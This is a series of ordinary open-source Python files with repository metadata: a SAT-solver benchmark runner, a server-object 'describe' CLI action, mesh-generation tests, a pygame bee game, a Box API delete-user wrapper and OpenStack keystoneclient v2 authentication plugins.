for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.smt2'):
print "Checking ", filename
sbox = initSbox * 10
nVars = 0
maxVars = 0
nAPIs = 0
iaTime = 0
testingTime=0
usTime=0
parsingTime=0
decompositionTime=0
miniSATTime=0
miniSATVars = 0;
time=0
miniSATCalls=0
miniSATClauses = 0
raSATClauses=0
decomposedLearnedClauses=0
UNSATLearnedClauses=0
unknownLearnedClauses=0
result='unknown'
raSATResult = 'unknown'
isEquation = '0'
isNotEquation = '0'
try:
f = open(os.path.join(root, filename))
for line in f:
if line.startswith('(set-info :status'):
result = line[18:len(line)-2]
f.close()
except IOError:
result = 'unknown'
bounds = ['lb=-1 1', 'lb=-10 10', 'lb=-inf inf']
boundsNum = len(bounds)
boundIndex = 0
while (raSATResult != 'sat' and time < timeout and boundIndex < boundsNum):
if raSATResult == 'unknown':
sbox = sbox / 10
subprocess.call(["./raSAT", os.path.join(root, filename), bounds[boundIndex], 'sbox=' + str(sbox), 'tout=' + str(timeout-time)])
try:
with open(os.path.join(root, filename) + '.tmp', 'rb') as csvfile:
reader = csv.reader(csvfile)
output = reader.next()
nVars = output[1]
maxVars = output[2]
nAPIs = output[3]
time += float(output[4])
iaTime += float(output[5])
testingTime += float(output[6])
usTime += float(output[7])
parsingTime += float(output[8])
decompositionTime += float(output[9])
miniSATTime += float(output[10])
miniSATVars += float(output[11])
miniSATClauses += float(output[12])
miniSATCalls += float(output[13])
raSATClauses += float(output[14])
decomposedLearnedClauses += float(output[15])
UNSATLearnedClauses += float(output[16])
unknownLearnedClauses += float(output[17])
isEquation = output[18]
isNotEquation = output[19]
raSATResult = output[20]
csvfile.close()
except IOError:
raSATResult = 'timeout'
if raSATResult == 'unsat':
boundIndex += 1
if raSATResult == 'sat' or raSATResult == 'unsat':
solvedProblems += 1
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow([os.path.join(root, filename), nVars, maxVars, nAPIs, time, iaTime, testingTime, usTime, parsingTime, decompositionTime, miniSATTime, miniSATVars, miniSATClauses, miniSATCalls, raSATClauses, decomposedLearnedClauses, UNSATLearnedClauses, unknownLearnedClauses, result, raSATResult, isEquation, isNotEquation])
csvfile.close()
try:
os.remove(os.path.join(root, filename) + '.tmp')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.in')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.out')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.rs')
except OSError:
pass
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', solvedProblems, 'EQ', 'NEQ'])
csvfile.close()
#run ('zankl', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('QF_NRA/meti-tarski', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('Test/meti-tarski', -1, 1, 0.1, 60, 'result.xls')
#run ('Test/zankl', -10, 10, 0.1, 30, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/AProVE', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/calypto', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/leipzig', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/mcm', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NRA/hycomp', -10, 10, 0.1, 60, '1-5-8.csv')
run ('Test/smtlib-20140121/QF_NRA/meti-tarski', -10, 10, 0.1, 60, '1-5-8-11.csv')
#run ('Test/test', -10, 10, 0.1, 60, 'result.csv')
| [
"[email protected]"
] | |
95292dbab6b727fc93cbd5ed860178fecee84ca4 | 752116ef4b69a3049fef0cfe9b3d212548cc81b1 | /sources/actions/watch/describe.py | ef16f46eb7e4fe787faa620233f6f13455fd54fb | [] | no_license | VDOMBoxGroup/runtime2.0 | e54af4af7a642f34b0e07b5d4096320494fb9ae8 | cb9932f5f75d5c6d7889f26d58aee079b4127299 | refs/heads/develop | 2023-07-07T11:06:10.817093 | 2023-07-03T06:11:55 | 2023-07-03T06:11:55 | 62,622,255 | 0 | 12 | null | 2023-05-23T02:55:00 | 2016-07-05T09:09:48 | Python | UTF-8 | Python | false | false | 4,418 | py |
from logs import console
from utils.structure import Structure
from utils.parsing import VALUE, Parser, ParsingException
from ..auxiliary import section, show
from .auxiliary import query
REQUEST = "<action name=\"describe\">%s</action>"
SOURCE_OBJECTS_OPTION = "<option name=\"source\">objects</option>"
SOURCE_GARBAGE_OPTION = "<option name=\"source\">garbage</option>"
SOURCE_CHANGES_OPTION = "<option name=\"source\">changes</option>"
FILTER_BY_SERVER_OPTION = "<option name=\"filter\">server</option>"
SORT_BY_NAME = "SORT BY NAME"
SORT_BY_COUNTER = "SORT BY COUNTYER"
SORT_VALUES = {
"n": SORT_BY_NAME,
"name": SORT_BY_NAME,
"c": SORT_BY_COUNTER,
"counter": SORT_BY_COUNTER
}
ORDER_BY_ASCENDING = "ORDER BY ASCENDING"
ORDER_BY_DESCENDING = "ORDER BY DESCENDING"
ORDER_VALUES = {
"a": ORDER_BY_ASCENDING,
"asc": ORDER_BY_ASCENDING,
"ascending": ORDER_BY_ASCENDING,
"d": ORDER_BY_DESCENDING,
"desc": ORDER_BY_DESCENDING,
"descending": ORDER_BY_DESCENDING
}
def sort_by_name(x):
return x[0]
def sort_by_counter(x):
return x[1], -x[2], x[0]
def builder(parser):
# <reply>
def reply():
result = Structure(entries=None)
# <descriptions>
def descriptions():
result.entries = []
# <subgroup>
def subgroup(name):
subgroup = []
result.entries.append((name, subgroup))
# <description>
def description(object):
value = yield VALUE
subgroup.append((object, value))
# </description>
return description
# </subgroup>
return subgroup
# </descriptions>
yield descriptions
parser.accept(result)
# </reply>
return reply
def run(address=None, port=None, timeout=None,
all=False, sort=None, order=None, limit=None,
objects=False, garbage=False, changes=False):
"""
describe server object changes
:param address: specifies server address
:key int port: specifies server port
:key float timeout: specifies timeout to wait for reply
:key switch all: disable objects filtering
:key sort: sort entries by "name" or by "counter"
:key order: sort entries "asc"ending or "desc"ending
:key int limit: limit output
:key switch objects: use all objects
:key switch garbage: use objects from garbage
:key switch changes: use changes
"""
try:
if sum((objects, garbage, changes)) > 1:
raise Exception("Options \"objects\", \"garbage\" and \"changes\" are mutually exclusive")
sort = SORT_VALUES.get((sort or "").lower(), SORT_BY_NAME)
if sort is SORT_BY_COUNTER and order is None:
order = "desc"
order = ORDER_VALUES.get((order or "").lower(), ORDER_BY_ASCENDING)
options = "".join(filter(None, (
SOURCE_OBJECTS_OPTION if objects else None,
SOURCE_GARBAGE_OPTION if garbage else None,
SOURCE_CHANGES_OPTION if changes else None,
None if all else FILTER_BY_SERVER_OPTION,)))
request = REQUEST % options
message = query("describe objects", address, port, request, timeout=timeout)
parser = Parser(builder=builder, notify=True, supress=True)
result = parser.parse(message)
if not result:
raise Exception("Incorrect response")
except ParsingException as error:
console.error("unable to parse, line %s: %s" % (error.lineno, error))
except Exception as error:
console.error(error)
else:
console.write()
with section("objects"):
if result.entries:
key = sort_by_counter if sort is SORT_BY_COUNTER else sort_by_name
reverse = order is ORDER_BY_DESCENDING
entries = sorted(result.entries, key=key, reverse=reverse)
if limit is not None:
entries = entries[:limit]
for name, subgroup in entries:
with section(name):
for object, description in subgroup:
with section(object, lazy=False):
for part in description.split(" < "):
show(part, longer=True)
else:
show("no objects")
| [
"[email protected]"
] | |
87cee6b3fc7d259b87a0cb05ee0fee88ed14e10f | 9ae2d337cbfa56768580187cc507f9c3c4ace1a8 | /test/test_meshzoo.py | abc4f1e9a37a6ea0c9ac22e5aea80e860fa44c3f | [
"MIT"
] | permissive | tongluocq/meshzoo | 5a734012e02f70bdf37147a3520b733f5095da02 | 46d3a999b7537fdcea92cd19ae53920b8639b0b3 | refs/heads/master | 2020-09-26T11:21:16.086387 | 2019-10-16T16:36:25 | 2019-10-16T16:36:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,706 | py | import numpy
import pytest
import meshzoo
from helpers import _near_equal
def test_cube():
points, cells = meshzoo.cube()
assert len(points) == 1331
assert len(cells) == 5000
points, cells = meshzoo.cube(nx=3, ny=3, nz=3)
assert len(points) == 27
assert all(numpy.sum(points, axis=0) == [13.5, 13.5, 13.5])
assert len(cells) == 40
def test_hexagon():
points, cells = meshzoo.hexagon(2)
assert len(points) == 61
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 96
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 5890, 11400, [0, 0, 0], [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]],
[2, 5890, 11400, [0, 0, 0], [2797750 / 9.0, 2679950 / 9.0, 58900 / 3.0]],
],
)
def test_moebius(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 190, 31, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[
1,
5700,
11020,
[0, 0, 0],
[[296107.21982759, 292933.72844828, 19040.94827586]],
],
[
2,
5700,
11020,
[0, 0, 0],
[[300867.45689655, 288173.49137931, 19040.94827586]],
],
],
)
def test_moebius2(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(nl=190, nw=30, num_twists=num_twists, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 1000, 1800, [0, 0, 0], [1418750 / 27.0, 1418750 / 27.0, 137500 / 27.0]],
[2, 1000, 1800, [0, 0, 0], [484375 / 9.0, 1384375 / 27.0, 137500 / 27.0]],
],
)
def test_moebius3(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 100, 10, mode="classical")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_pseudomoebius():
points, cells = meshzoo.moebius(nl=190, nw=31, mode="pseudo")
assert len(points) == 5890
assert len(cells) == 11400
assert _near_equal(numpy.sum(points, axis=0), [0, 0, 0], tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
ref2 = [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_rectangle():
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=False)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=True)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=2, ny=2, zigzag=True)
assert len(points) == 4
assert _near_equal(numpy.sum(points, axis=0), [2.0, 2.0, 0.0])
assert len(cells) == 2
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=False)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=True)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
def test_simple_arrow():
points, cells = meshzoo.simple_arrow()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [7.0, 0.0, 0.0])
assert len(cells) == 4
def test_simple_shell():
points, cells = meshzoo.simple_shell()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 1.0])
assert len(cells) == 4
def test_triangle():
points, cells = meshzoo.triangle(4)
assert len(points) == 15
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 16
def test_tube():
points, cells = meshzoo.tube(n=10)
assert len(points) == 20
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 20
def test_plot2d():
points, cells = meshzoo.triangle(4)
meshzoo.show2d(points, cells)
# def test_ball():
# points, cells = meshzoo.meshpy.ball.create_ball_mesh(10)
# assert len(points) == 1360
# assert len(cells) == 5005
#
#
# def test_cube():
# points, cells = meshzoo.meshpy.cube.create_mesh(10)
# assert len(points) == 50
# assert len(cells) == 68
#
#
# def test_ellipse():
# points, cells = meshzoo.meshpy.ellipse.create_mesh(0.5, 1, 100)
# assert len(points) == 1444
# assert len(cells) == 2774
#
#
# def test_lshape():
# points, cells = meshzoo.meshpy.lshape.create_mesh()
# assert len(points) == 38
# assert len(cells) == 58
#
#
# def test_lshape3d():
# points, cells = meshzoo.meshpy.lshape3d.create_mesh()
# assert len(points) == 943
# assert len(cells) == 3394
#
#
# def test_pacman():
# points, cells = meshzoo.meshpy.pacman.create_pacman_mesh()
# assert len(points) == 446
# assert len(cells) == 831
#
#
# def test_rectangle():
# points, cells = meshzoo.meshpy.rectangle.create_mesh()
# assert len(points) == 88
# assert len(cells) == 150
#
#
# def test_rectangle_with_hole():
# points, cells = meshzoo.meshpy.rectangle_with_hole.create_mesh()
# assert len(points) == 570
# assert len(cells) == 964
#
#
# def test_tetrahedron():
# points, cells = meshzoo.meshpy.tetrahedron.create_tetrahedron_mesh()
# assert len(points) == 604
# assert len(cells) == 1805
#
#
# def test_torus():
# points, cells = meshzoo.meshpy.torus.create_mesh()
# assert len(points) == 921
# assert len(cells) == 2681
# Disable for now since Gmsh doesn't pass for the version installed on travis
# (trusty).
# def test_screw():
# points, cells = meshzoo.pygmsh.screw.create_screw_mesh()
# assert len(points) == 2412
# assert len(cells) == 7934
# Disable for now since we need mshr in a dev version for mshr.Extrude2D
# def test_toy():
# points, cells = meshzoo.mshr.toy.create_toy_mesh()
# assert len(points) == 2760
# assert len(cells) == 11779
# if __name__ == '__main__':
# test_plot2d()
# # import meshio
# # points_, cells_ = meshzoo.triangle(7)
# # meshio.write('triangle.vtu', points_, {'triangle': cells_})
# # points_, cells_ = meshzoo.cube()
# # meshio.write('cube.vtu', points_, {'tetra': cells_})
def test_edges():
_, cells = meshzoo.triangle(2)
edges_nodes, edges_cells = meshzoo.create_edges(cells)
assert numpy.all(
edges_nodes
== [[0, 1], [0, 3], [1, 2], [1, 3], [1, 4], [2, 4], [3, 4], [3, 5], [4, 5]]
)
assert numpy.all(edges_cells == [[3, 1, 0], [5, 4, 2], [6, 3, 4], [8, 7, 6]])
| [
"[email protected]"
] | |
586fbbda387bcc0fd0af65aec9272afaf55c6d94 | db3a0578ef5d79cee7f9e96fa3fd291bbaaf9eb4 | /Pygame/Bees/bees.py | 90620d058d1920a15e8892180aa8c230a8c0d55f | [
"MIT"
] | permissive | otisgbangba/python-lessons | 0477a766cda6bc0e2671e4cce2f95bc62c8d3c43 | a29f5383b56b21e6b0bc21aa9acaec40ed4df3cc | refs/heads/master | 2022-11-03T22:10:52.845204 | 2020-06-13T15:42:40 | 2020-06-13T15:42:40 | 261,255,751 | 1 | 0 | MIT | 2020-05-04T17:48:12 | 2020-05-04T17:48:11 | null | UTF-8 | Python | false | false | 1,885 | py | import pygame, random
from pygame.locals import *
from util import loadImage
from bee import Bee
from flower import Flower
from score import Score
pygame.init()
TITLE = 'Bee, Get the Nectar!'
screen = pygame.display.set_mode((1280, 720), 0)
screenRect = screen.get_rect()
Bee.loadImages()
Flower.loadImages()
background = loadImage('clover-large.jpg')
font = pygame.font.Font(None, 48)
text = font.render(TITLE, 1, Color('white'))
textpos = text.get_rect(centerx=screenRect.width/2, centery=25)
background.blit(text, textpos)
screen.blit(background, (0, 0))
pygame.display.flip()
bee = Bee(screenRect)
flowers = pygame.sprite.Group()
score = Score()
drawingGroup = pygame.sprite.RenderUpdates()
drawingGroup.add(bee)
drawingGroup.add(score)
pygame.display.set_caption(TITLE)
pygame.mouse.set_visible(0)
clock = pygame.time.Clock()
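# sprite rotation angle for each movement direction, indexed as angles[ydir+1][xdir+1]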
angles = (( 45, 0, -45),
( 90, 0, -90),
(135, 180, -135))
# game loop
loop = True
while loop:
# get input
for event in pygame.event.get():
if event.type == QUIT \
or (event.type == KEYDOWN and event.key == K_ESCAPE):
loop = False
keystate = pygame.key.get_pressed()
xdir = keystate[K_RIGHT] - keystate[K_LEFT] # -1, 0, or 1
ydir = keystate[K_DOWN] - keystate[K_UP]
bee.setAngle(angles[ydir+1][xdir+1])
bee.rect = bee.rect.move((xdir * 8, ydir * 8)).clamp(screenRect)
# Detect collisions
for flower in pygame.sprite.spritecollide(bee, flowers, True):
score.score += 1
flower.kill()
if random.randint(0, 50) == 0:
flower = Flower(screenRect)
drawingGroup.add(flower)
flowers.add(flower)
drawingGroup.clear(screen, background)
drawingGroup.update()
changedRects = drawingGroup.draw(screen)
pygame.display.update(changedRects)
# maintain frame rate
clock.tick(40)
pygame.quit()
| [
"[email protected]"
] | |
fc5c6cf54acdc92357aedf5a77af4161c7885cb0 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Box/Users/DeleteUser.py | 19db5a19eb485a39cf7171ed247400616e188e0a | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,041 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# DeleteUser
# Deletes a specified user.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteUser(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteUser Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Box/Users/DeleteUser')
def new_input_set(self):
return DeleteUserInputSet()
def _make_result_set(self, result, path):
return DeleteUserResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteUserChoreographyExecution(session, exec_id, path)
class DeleteUserInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteUser
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_Force(self, value):
"""
Set the value of the Force input for this Choreo. ((optional, boolean) Whether or not the user should be deleted even when they still own files.)
"""
InputSet._set_input(self, 'Force', value)
def set_Notify(self, value):
"""
Set the value of the Notify input for this Choreo. ((optional, boolean) Indicates that the user should receive an email notification of the transfer.)
"""
InputSet._set_input(self, 'Notify', value)
def set_UserID(self, value):
"""
Set the value of the UserID input for this Choreo. ((required, string) The id of the user whose information should be updated.)
"""
InputSet._set_input(self, 'UserID', value)
class DeleteUserResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteUser Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Box.)
"""
return self._output.get('Response', None)
class DeleteUserChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteUserResultSet(response, path)
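
# Illustrative usage (added; not part of the generated file). Assumes a valid
# TembooSession and the standard execute_with_results() entry point of the
# Temboo SDK:
#
#   choreo = DeleteUser(session)
#   inputs = choreo.new_input_set()
#   inputs.set_AccessToken(access_token)
#   inputs.set_UserID("12345")
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())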
| [
"[email protected]"
] | |
b4fdf0086dda0bb0a9e8e631adbd62959995d35f | be01d0d54723d1e876c9a15618921dffe2b2255a | /Python/BinarySearch/two_sumII.py | 0d534e7163571ad8332aad8f4b807b4999e276c6 | [] | no_license | jxlxt/leetcode | 17e7f25bf94dd334ac0d6254ffcffa003ed04c10 | a6e6e5be3dd5f9501d0aa4caa6744621ab887f51 | refs/heads/master | 2023-05-26T22:10:03.997428 | 2023-05-24T02:36:05 | 2023-05-24T02:36:05 | 118,216,055 | 0 | 0 | null | 2018-01-20T06:31:57 | 2018-01-20T06:30:06 | null | UTF-8 | Python | false | false | 1,122 | py | #! /Users/xiaotongli/anaconda3/bin/python
# -*- coding: utf-8 -*-
# @Time : 9/28/18 10:57 PM
# @Author : Xiaotong Li
# @School : University of California, Santa Cruz
# @FileName: two_sumII.py
# @Software: PyCharm
class Solution:
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
        # the first method uses a dictionary (hash map); use ``seen`` so the
        # built-in name ``dict`` is not shadowed
        seen = {}
        # enumerate() yields both the index and the value of the array
        for i, num in enumerate(numbers):
            if target - num in seen:
                return [seen[target - num] + 1, i + 1]
            seen[num] = i
        # alternative: binary search for the complement (only reached if the
        # dictionary pass above found no pair)
for i in range(len(numbers)):
left, right = i+1, len(numbers) - 1
res = target - numbers[i]
while left <= right:
mid = left + (right - left) // 2
if numbers[mid] == res:
return [i+1, mid+1]
elif numbers[mid] < res:
left = mid + 1
else:
right = mid - 1
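
# Quick self-check (added for illustration): ``numbers`` is assumed to be
# sorted ascending, as in LeetCode 167 "Two Sum II".
if __name__ == "__main__":
    assert Solution().twoSum([2, 7, 11, 15], 9) == [1, 2]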
| [
"[email protected]"
] | |
bbc97a0c69bc5c0d0fd4008b39d904edef1921b0 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/periodicities/Month/Cycle_Month_25_M_360.py | 82ea2d119aaaddab2bb5d8c525d24df36e2a36a3 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 82 | py | import tests.periodicities.period_test as per
per.buildModel((360 , 'M' , 25));
| [
"[email protected]"
] | |
5bc08a32ba5bc9e78823dc89fe5070e1deb89e25 | 057d2d1e2a78fc89851154e87b0b229e1e1f003b | /venv/Lib/site-packages/keystoneclient/auth/identity/v2.py | add1da4f5d894be3192f1253735eca8da6d07f56 | [
"Apache-2.0"
] | permissive | prasoon-uta/IBM-Cloud-Secure-File-Storage | 276dcbd143bd50b71121a73bc01c8e04fe3f76b0 | 82a6876316715efbd0b492d0d467dde0ab26a56b | refs/heads/master | 2022-12-13T00:03:31.363281 | 2018-02-22T02:24:11 | 2018-02-22T02:24:11 | 122,420,622 | 0 | 2 | Apache-2.0 | 2022-12-08T05:15:19 | 2018-02-22T02:26:48 | Python | UTF-8 | Python | false | false | 7,824 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
from oslo_config import cfg
import six
from keystoneclient import access
from keystoneclient.auth.identity import base
from keystoneclient import exceptions
from keystoneclient import utils
_logger = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class Auth(base.BaseIdentityPlugin):
"""Identity V2 Authentication Plugin.
:param string auth_url: Identity service endpoint for authorization.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for project scoping.
:param string tenant_name: Tenant name for project scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
@classmethod
def get_options(cls):
options = super(Auth, cls).get_options()
options.extend([
cfg.StrOpt('tenant-id', help='Tenant ID'),
cfg.StrOpt('tenant-name', help='Tenant Name'),
cfg.StrOpt('trust-id', help='Trust ID'),
])
return options
def __init__(self, auth_url,
trust_id=None,
tenant_id=None,
tenant_name=None,
reauthenticate=True):
super(Auth, self).__init__(auth_url=auth_url,
reauthenticate=reauthenticate)
self._trust_id = trust_id
self.tenant_id = tenant_id
self.tenant_name = tenant_name
@property
def trust_id(self):
# Override to remove deprecation.
return self._trust_id
@trust_id.setter
def trust_id(self, value):
# Override to remove deprecation.
self._trust_id = value
def get_auth_ref(self, session, **kwargs):
headers = {'Accept': 'application/json'}
url = self.auth_url.rstrip('/') + '/tokens'
params = {'auth': self.get_auth_data(headers)}
if self.tenant_id:
params['auth']['tenantId'] = self.tenant_id
elif self.tenant_name:
params['auth']['tenantName'] = self.tenant_name
if self.trust_id:
params['auth']['trust_id'] = self.trust_id
_logger.debug('Making authentication request to %s', url)
resp = session.post(url, json=params, headers=headers,
authenticated=False, log=False)
try:
resp_data = resp.json()['access']
except (KeyError, ValueError):
raise exceptions.InvalidResponse(response=resp)
return access.AccessInfoV2(**resp_data)
@abc.abstractmethod
def get_auth_data(self, headers=None):
"""Return the authentication section of an auth plugin.
:param dict headers: The headers that will be sent with the auth
request if a plugin needs to add to them.
:return: A dict of authentication data for the auth type.
:rtype: dict
"""
pass # pragma: no cover
_NOT_PASSED = object()
class Password(Auth):
"""A plugin for authenticating with a username and password.
A username or user_id must be provided.
:param string auth_url: Identity service endpoint for authorization.
:param string username: Username for authentication.
:param string password: Password for authentication.
:param string user_id: User ID for authentication.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
:raises TypeError: if a user_id or username is not provided.
"""
def __init__(self, auth_url, username=_NOT_PASSED, password=None,
user_id=_NOT_PASSED, **kwargs):
super(Password, self).__init__(auth_url, **kwargs)
if username is _NOT_PASSED and user_id is _NOT_PASSED:
msg = 'You need to specify either a username or user_id'
raise TypeError(msg)
if username is _NOT_PASSED:
username = None
if user_id is _NOT_PASSED:
user_id = None
self.user_id = user_id
self._username = username
self._password = password
@property
def username(self):
# Override to remove deprecation.
return self._username
@username.setter
def username(self, value):
# Override to remove deprecation.
self._username = value
@property
def password(self):
# Override to remove deprecation.
return self._password
@password.setter
def password(self, value):
# Override to remove deprecation.
self._password = value
def get_auth_data(self, headers=None):
auth = {'password': self.password}
if self.username:
auth['username'] = self.username
elif self.user_id:
auth['userId'] = self.user_id
return {'passwordCredentials': auth}
@classmethod
def load_from_argparse_arguments(cls, namespace, **kwargs):
if not (kwargs.get('password') or namespace.os_password):
kwargs['password'] = utils.prompt_user_password()
return super(Password, cls).load_from_argparse_arguments(namespace,
**kwargs)
@classmethod
def get_options(cls):
options = super(Password, cls).get_options()
options.extend([
cfg.StrOpt('username',
dest='username',
deprecated_name='user-name',
help='Username to login with'),
cfg.StrOpt('user-id', help='User ID to login with'),
cfg.StrOpt('password', secret=True, help='Password to use'),
])
return options
class Token(Auth):
"""A plugin for authenticating with an existing token.
:param string auth_url: Identity service endpoint for authorization.
:param string token: Existing token for authentication.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param string trust_id: Trust ID for trust scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
def __init__(self, auth_url, token, **kwargs):
super(Token, self).__init__(auth_url, **kwargs)
self._token = token
@property
def token(self):
# Override to remove deprecation.
return self._token
@token.setter
def token(self, value):
# Override to remove deprecation.
self._token = value
def get_auth_data(self, headers=None):
if headers is not None:
headers['X-Auth-Token'] = self.token
return {'token': {'id': self.token}}
@classmethod
def get_options(cls):
options = super(Token, cls).get_options()
options.extend([
cfg.StrOpt('token', secret=True, help='Token'),
])
return options
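
# Example (added for illustration; not part of this module). Authenticating
# through a keystoneclient Session, the documented companion API for these
# plugins; the endpoint and credentials below are placeholders:
#
#   from keystoneclient import session
#
#   auth = Password(auth_url='http://keystone:5000/v2.0',
#                   username='demo', password='secret',
#                   tenant_name='demo')
#   sess = session.Session(auth=auth)
#   token = sess.get_token()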
| [
"[email protected]"
] | |
